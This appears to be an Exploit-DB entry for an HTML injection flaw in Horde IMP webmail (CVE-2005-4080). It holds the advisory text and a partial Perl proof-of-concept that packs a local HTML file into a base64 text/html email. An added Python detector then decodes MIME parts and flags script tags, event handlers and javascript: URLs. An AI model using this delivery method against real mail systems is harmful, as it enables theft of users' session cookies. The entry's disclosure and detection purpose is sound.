Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability

ID EDB-ID:26741
Type exploitdb
Reporter SEC Consult
Modified 2005-12-06T00:00:00


Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability. CVE-2005-4080. Remote exploit for linux platform

source: http://www.securityfocus.com/bid/15730/info

Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

Reports indicate this issue is only present when viewing IMP content with the Microsoft Internet Explorer Web browser. 

# MIME::Lite SMTP client by C3PO
   use strict;
   use MIME::Base64;
   use MIME::Lite;
#                    load_file
   # Read a file in binary mode and return its contents.
   sub load_file{
      my($file) = shift;
      my $Body;
      open(IN, $file) || die("Can't open $file $!");
      binmode IN;
      read(IN, $Body, -s $file);
      close(IN);
      return $Body;
   }
#                      main
   my $c = load_file('\Xploits\horder\passed.htm'); #content
   # Build a message whose body is the loaded HTML, base64-encoded.
   my $m = MIME::Lite->new(
                 From    =>'mail@domain.zone',
                 To      =>'mail@domain.zone',
                 Subject =>'Horde',
                 Date    =>"Tue, 17 Dec 2002 22:00:02 +0300",
                 Type    =>"text/html",
                 Data    => $c,
                 Encoding =>'base64'
   );
   $m->attr('content-type.charset' => 'windows-1251'); #not necessary
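
The proof-of-concept above delivers its HTML as a base64-encoded text/html part, so a filter that searches the raw message for markup finds nothing. The following Python code is an added example, not part of the original advisory or of Horde's code: it decodes each HTML-capable MIME part before checking it for active content. The regex heuristic, the function names and the sample message are constructed assumptions.

```python
import base64
import re
from email import message_from_bytes, policy

# Heuristic markers of active content (assumption: not a complete HTML sanitizer).
ACTIVE = re.compile(
    rb"<\s*(?:script|iframe|object|embed)\b|\bon\w+\s*=|javascript\s*:", re.I)
HTML_TYPES = ("text/html", "application/xhtml+xml")


def risky_html_parts(raw: bytes):
    """Return (content_type, filename, marker) for HTML parts with active content."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        name = part.get_filename() or ""
        if ctype not in HTML_TYPES and not name.lower().endswith((".htm", ".html")):
            continue
        # decode=True undoes the base64 / quoted-printable transfer encoding.
        body = part.get_payload(decode=True) or b""
        hit = ACTIVE.search(body)
        if hit:
            findings.append((ctype, name, hit.group(0).decode("ascii", "replace")))
    return findings


def build_sample(html: bytes) -> bytes:
    """Constructed test message shaped like the PoC: text/html with a base64 body."""
    headers = (
        "From: sender@example.test\r\n"
        "To: rcpt@example.test\r\n"
        "Subject: constructed sample\r\n"
        "MIME-Version: 1.0\r\n"
        "Content-Type: text/html; charset=windows-1251\r\n"
        "Content-Transfer-Encoding: base64\r\n\r\n"
    )
    return headers.encode() + base64.encodebytes(html)


if __name__ == "__main__":
    flagged = build_sample(b"<p>hello</p><script>/* constructed marker */</script>")
    clean = build_sample(b"<p>hello</p>")
    print("raw message contains '<script':", b"<script" in flagged)
    print("flagged:", risky_html_parts(flagged))
    print("clean:  ", risky_html_parts(clean))
```

A hit from this check is a reason to serve the part as a download or to sanitize it before display, rather than rendering it inline in the webmail origin.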